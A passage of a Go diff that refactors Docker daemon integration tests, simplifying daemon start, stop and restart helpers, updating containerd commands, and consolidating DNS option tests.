{ - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) - parent1Args := []string{} - parent2Args := []string{} + var parent1Args []string + var parent2Args []string wg := sync.WaitGroup{} maxChildren := 10 chErr := make(chan error, maxChildren) @@ -1940,7 +1844,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { } go func() { - _, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + _, err := s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") chErr <- err wg.Done() }() @@ -1957,18 +1861,16 @@ func (s *DockerDaemonSuite) TestDaemonRestartContainerLinksRestart(c *check.C) { parent2Args = append([]string{"run", "-d"}, parent2Args...) parent2Args = append(parent2Args, []string{"--name=parent2", "--restart=always", "busybox", "top"}...) - _, err = s.d.Cmd(parent1Args...) + _, err := s.d.Cmd(parent1Args...) c.Assert(err, check.IsNil) _, err = s.d.Cmd(parent2Args...) c.Assert(err, check.IsNil) - err = s.d.Stop() - c.Assert(err, check.IsNil) + s.d.Stop(c) // clear the log file -- we don't need any of it but may for the next part // can ignore the error here, this is just a cleanup os.Truncate(s.d.LogFileName(), 0) - err = s.d.Start() - c.Assert(err, check.IsNil) + s.d.Start(c) for _, num := range []string{"1", "2"} { out, err := s.d.Cmd("inspect", "-f", "{{ .State.Running }}", "parent"+num) @@ -1986,13 +1888,12 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { cgroupParent := "test" name := "cgroup-test" - err := s.d.StartWithBusybox("--cgroup-parent", cgroupParent) - c.Assert(err, check.IsNil) - defer s.d.Restart() + s.d.StartWithBusybox(c, "--cgroup-parent", cgroupParent) + defer s.d.Restart(c) out, err := s.d.Cmd("run", "--name", name, "busybox", "cat", "/proc/self/cgroup") c.Assert(err, checker.IsNil) - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) c.Assert(len(cgroupPaths), checker.Not(checker.Equals), 0, check.Commentf("unexpected output - %q", string(out))) out, err = s.d.Cmd("inspect", "-f", "{{.Id}}", name) c.Assert(err, checker.IsNil) @@ -2010,8 +1911,7 @@ func (s *DockerDaemonSuite) TestDaemonCgroupParent(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2019,7 +1919,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { out, err = s.d.Cmd("run", "--name=test2", "--link", "test:abc", "busybox", "sh", "-c", "ping -c 1 -w 1 abc") c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) // should fail since test is not running yet out, err = s.d.Cmd("start", "test2") @@ -2034,8 +1934,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithLinks(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("create", "--name=test", "busybox") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2047,7 +1946,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { out, err = s.d.Cmd("run", "-d", "--name=test3", "--link", "test2:abc", "busybox", "top") test3ID := strings.TrimSpace(out) - c.Assert(s.d.Restart(), check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("create", "--name=test", "busybox") c.Assert(err, check.NotNil, check.Commentf("expected error trying to create container with duplicate name")) @@ -2081,14 +1980,11 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithNames(c *check.C) { // TestDaemonRestartWithKilledRunningContainer requires live restore of running containers func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check.C) { - // TODO(mlaventure): Not sure what would the exit code be on windows testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox(); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t) cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") - defer s.d.Stop() + defer s.d.Stop(t) if err != nil { t.Fatal(cid, err) } @@ -2104,24 +2000,20 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check } // kill the container - runCmd := exec.Command(ctrBinary, "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", "containers", "kill", cid) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - t.Fatalf("Failed to run ctr, ExitCode: %d, err: '%v' output: '%s' cid: '%s'\n", ec, err, out, cid) - } + icmd.RunCommand(ctrBinary, "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", moby_daemon.ContainersNamespace, "tasks", "kill", cid).Assert(t, icmd.Success) // Give time to containerd to process the command if we don't // the exit event might be received after we do the inspect - pidCmd := exec.Command("kill", "-0", pid) - _, ec, _ := runCommandWithOutput(pidCmd) - for ec == 0 { + result := icmd.RunCommand("kill", "-0", pid) + for result.ExitCode == 0 { time.Sleep(1 * time.Second) - _, ec, _ = runCommandWithOutput(pidCmd) + // FIXME(vdemeester) should we check it doesn't error out ? + result = icmd.RunCommand("kill", "-0", pid) } // restart the daemon - if err := s.d.Start(); err != nil { - t.Fatal(err) - } + s.d.Start(t) // Check that we've got the correct exit code out, err := s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", cid) @@ -2139,24 +2031,27 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithKilledRunningContainer(t *check // them now, should remove the mounts. func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { testRequires(c, DaemonIsLinux) - c.Assert(s.d.StartWithBusybox("--live-restore"), check.IsNil) + s.d.StartWithBusybox(c, "--live-restore") out, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) id := strings.TrimSpace(out) - c.Assert(s.d.cmd.Process.Signal(os.Kill), check.IsNil) + // kill the daemon + c.Assert(s.d.Kill(), check.IsNil) + + // Check if there are mounts with container id visible from the host. + // If not, those mounts exist in container's own mount ns, and so + // the following check for mounts being cleared is pointless. + skipMountCheck := false mountOut, err := ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - - // container mounts should exist even after daemon has crashed. - comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) - c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + if !strings.Contains(string(mountOut), id) { + skipMountCheck = true + } // restart daemon. - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatal(err) - } + s.d.Start(c, "--live-restore") // container should be running. out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id) @@ -2170,23 +2065,23 @@ func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { out, err = s.d.Cmd("stop", id) c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + if skipMountCheck { + return + } // Now, container mounts should be gone. mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) } // TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers. func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) { - // TODO(mlaventure): Not sure what would the exit code be on windows testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t, "--live-restore") cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") - defer s.d.Stop() + defer s.d.Stop(t) if err != nil { t.Fatal(cid, err) } @@ -2208,9 +2103,10 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che // resume the container result := icmd.RunCommand( ctrBinary, - "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", - "containers", "resume", cid) - t.Assert(result, icmd.Matches, icmd.Success) + "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", moby_daemon.ContainersNamespace, + "tasks", "resume", cid) + result.Assert(t, icmd.Success) // Give time to containerd to process the command if we don't // the resume event might be received after we do the inspect @@ -2220,9 +2116,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che }, checker.Equals, 0) // restart the daemon - if err := s.d.Start("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.Start(t, "--live-restore") // Check that we've got the correct status out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid) @@ -2241,8 +2135,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che // this ensures that the old, pre gh#16032 functionality continues on func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2260,17 +2153,19 @@ func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) { c.Assert(err, check.NotNil, check.Commentf(out)) c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("start", "-a", "test2") c.Assert(err, check.NotNil, check.Commentf(out)) c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") } func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { - testRequires(c, DaemonIsLinux, NotPpc64le) + testRequires(c, DaemonIsLinux) - infoLog := "\x1b[34mINFO\x1b" + infoLog := "\x1b[36mINFO\x1b" + + b := bytes.NewBuffer(nil) + done := make(chan bool) p, tty, err := pty.Open() c.Assert(err, checker.IsNil) @@ -2279,24 +2174,43 @@ func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { p.Close() }() - b := bytes.NewBuffer(nil) - go io.Copy(b, p) + go func() { + io.Copy(b, p) + done <- true + }() // Enable coloring explicitly s.d.StartWithLogFile(tty, "--raw-logs=false") - s.d.Stop() + s.d.Stop(c) + // Wait for io.Copy() before checking output + <-done c.Assert(b.String(), checker.Contains, infoLog) b.Reset() + // "tty" is already closed in prev s.d.Stop(), + // we have to close the other side "p" and open another pair of + // pty for the next test. + p.Close() + p, tty, err = pty.Open() + c.Assert(err, checker.IsNil) + + go func() { + io.Copy(b, p) + done <- true + }() + // Disable coloring explicitly s.d.StartWithLogFile(tty, "--raw-logs=true") - s.d.Stop() + s.d.Stop(c) + // Wait for io.Copy() before checking output + <-done + c.Assert(b.String(), check.Not(check.Equals), "") c.Assert(b.String(), check.Not(checker.Contains), infoLog) } func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { - testRequires(c, DaemonIsLinux, NotPpc64le) + testRequires(c, DaemonIsLinux) debugLog := "\x1b[37mDEBU\x1b" @@ -2311,7 +2225,7 @@ func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { go io.Copy(b, p) s.d.StartWithLogFile(tty, "--debug") - s.d.Stop() + s.d.Stop(c) c.Assert(b.String(), checker.Contains, debugLog) } @@ -2333,8 +2247,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { // --log-level needs to be set so that d.Start() doesn't add --debug causing // a conflict with the config - err = s.d.Start("--config-file", configFilePath, "--log-level=info") - c.Assert(err, checker.IsNil) + s.d.Start(c, "--config-file", configFilePath, "--log-level=info") // daemon config file daemonConfig = `{ @@ -2351,7 +2264,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { _, err = configFile.Write([]byte(daemonConfig)) c.Assert(err, checker.IsNil) - err = s.d.reloadConfig() + err = s.d.ReloadConfig() c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) out, err := s.d.Cmd("info") @@ -2363,8 +2276,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { // Test for #21956 func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { - err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") out, err := s.d.Cmd("run", "-d", "--log-driver=json-file", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2377,11 +2289,12 @@ func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { // Test case for #20936, #22443 func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) { - c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil) + s.d.Start(c, "--max-concurrent-uploads=6", "--max-concurrent-downloads=8") expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } @@ -2399,11 +2312,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { daemonConfig := `{ "max-concurrent-downloads" : 8 }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2413,13 +2327,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) + // unix.Kill(s.d.cmd.Process.Pid, unix.SIGHUP) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } @@ -2437,11 +2353,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec daemonConfig := `{ "max-concurrent-uploads" : null }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2451,13 +2368,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) + // unix.Kill(s.d.cmd.Process.Pid, unix.SIGHUP) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2467,62 +2386,44 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) { - err := s.d.StartWithBusybox("-b=none", "--iptables=false") - c.Assert(err, check.IsNil) - s.d.c.Logf("dockerBinary %s", dockerBinary) - out, code, err := s.d.buildImageWithOut("busyboxs", - `FROM busybox - RUN cat /etc/hosts`, false) - comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err) - c.Assert(err, check.IsNil, comment) - c.Assert(code, check.Equals, 0, comment) + s.d.StartWithBusybox(c, "-b=none", "--iptables=false") + + result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d), + build.WithDockerfile(` + FROM busybox + RUN cat /etc/hosts`), + build.WithoutCache, + ) + comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error) + c.Assert(result.Error, check.IsNil, comment) + c.Assert(result.ExitCode, check.Equals, 0, comment) } // Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) { +func (s *DockerDaemonSuite) TestDaemonDNSFlagsInHostMode(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - err := s.d.StartWithBusybox("--dns", "1.2.3.4") - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c, "--dns", "1.2.3.4", "--dns-search", "example.com", "--dns-opt", "timeout:3") expectedOutput := "nameserver 1.2.3.4" out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} - -// Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.StartWithBusybox("--dns-search", "example.com") - c.Assert(err, checker.IsNil) - - expectedOutput := "search example.com" - out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + expectedOutput = "search example.com" c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} - -// Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.StartWithBusybox("--dns-opt", "timeout:3") - c.Assert(err, checker.IsNil) - - expectedOutput := "options timeout:3" - out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + expectedOutput = "options timeout:3" c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) } @@ -2549,8 +2450,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - err = s.d.StartWithBusybox("--config-file", configName) - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--config-file", configName) // Run with default runtime out, err := s.d.Cmd("run", "--rm", "busybox", "ls") @@ -2577,7 +2477,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) @@ -2606,11 +2506,12 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`) // Check that we can select a default runtime @@ -2631,7 +2532,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) @@ -2645,8 +2546,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { - err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") // Run with default runtime out, err := s.d.Cmd("run", "--rm", "busybox", "ls") @@ -2666,9 +2566,8 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") // Start a daemon without any extra runtimes - s.d.Stop() - err = s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.Stop(c) + s.d.StartWithBusybox(c) // Run with default runtime out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") @@ -2685,17 +2584,16 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { c.Assert(out, checker.Contains, "Unknown runtime specified oci") // Check that we can't override the default runtime - s.d.Stop() - err = s.d.Start("--add-runtime", "runc=my-runc") - c.Assert(err, check.NotNil) + s.d.Stop(c) + c.Assert(s.d.StartWithError("--add-runtime", "runc=my-runc"), checker.NotNil) - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`) // Check that we can select a default runtime - s.d.Stop() - err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") - c.Assert(err, check.IsNil) + s.d.Stop(c) + s.d.StartWithBusybox(c, "--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") out, err = s.d.Cmd("run", "--rm", "busybox", "ls") c.Assert(err, check.NotNil, check.Commentf(out)) @@ -2707,8 +2605,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) // top1 will exist after daemon restarts out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top") @@ -2722,8 +2619,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running")) // now restart daemon gracefully - err = s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("ps", "-a") c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) @@ -2732,12 +2628,18 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) } func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) containerName := "error-values" // Make a container with both a non 0 exit code and an error message - out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto") + // We explicitly disable `--init` for this test, because `--init` is enabled by default + // on "experimental". Enabling `--init` results in a different behavior; because the "init" + // process itself is PID1, the container does not fail on _startup_ (i.e., `docker-init` starting), + // but directly after. The exit code of the container is still 127, but the Error Message is not + // captured, so `.State.Error` is empty. + // See the discussion on https://github.com/docker/docker/pull/30227#issuecomment-274161426, + // and https://github.com/docker/docker/pull/26061#r78054578 for more information. + out, err := s.d.Cmd("run", "--name", containerName, "--init=false", "busybox", "toto") c.Assert(err, checker.NotNil) // Check that those values were saved on disk @@ -2746,13 +2648,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(out, checker.Equals, "127") - out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) - out = strings.TrimSpace(out) + errMsg1, err := s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + errMsg1 = strings.TrimSpace(errMsg1) c.Assert(err, checker.IsNil) + c.Assert(errMsg1, checker.Contains, "executable file not found") // now restart daemon - err = s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) // Check that those values are still around out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) @@ -2763,86 +2665,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) out = strings.TrimSpace(out) c.Assert(err, checker.IsNil) -} - -func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) { - testRequires(c, SameHostDaemon) - d := s.d - err := d.StartWithBusybox() - c.Assert(err, checker.IsNil) - - // hack to be able to side-load a container config - out, err := d.Cmd("create", "busybox:latest") - c.Assert(err, checker.IsNil, check.Commentf(out)) - id := strings.TrimSpace(out) - - out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(d.Stop(), checker.IsNil) - <-d.wait - - imageID := strings.TrimSpace(out) - volumeID := stringid.GenerateNonCryptoID() - vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID) - c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil) - - config := []byte(` - { - "ID": "` + id + `", - "Name": "hello", - "Driver": "` + d.storageDriver + `", - "Image": "` + imageID + `", - "Config": {"Image": "busybox:latest"}, - "NetworkSettings": {}, - "Volumes": { - "/bar":"/foo", - "/foo": "` + vfsPath + `", - "/quux":"/quux" - }, - "VolumesRW": { - "/bar": true, - "/foo": true, - "/quux": false - } - } - `) - - configPath := filepath.Join(d.root, "containers", id, "config.v2.json") - err = ioutil.WriteFile(configPath, config, 600) - err = d.Start() - c.Assert(err, checker.IsNil) - - out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - type mount struct { - Name string - Source string - Destination string - Driver string - RW bool - } - - ls := []mount{} - err = json.NewDecoder(strings.NewReader(out)).Decode(&ls) - c.Assert(err, checker.IsNil) - - expected := []mount{ - {Source: "/foo", Destination: "/bar", RW: true}, - {Name: volumeID, Destination: "/foo", RW: true}, - {Source: "/quux", Destination: "/quux", RW: false}, - } - c.Assert(ls, checker.HasLen, len(expected)) - - for _, m := range ls { - var matched bool - for _, x := range expected { - if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name { - matched = true - break - } - } - c.Assert(matched, checker.True, check.Commentf("did find match for %+v", m)) - } + c.Assert(out, checker.Equals, errMsg1) } func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { @@ -2858,17 +2681,17 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { c.Assert(cmd.Run(), checker.IsNil) // custom one - c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil) + s.d.StartWithBusybox(c, "--userland-proxy-path", newProxyPath) out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.IsNil, check.Commentf(out)) // try with the original one - c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil) 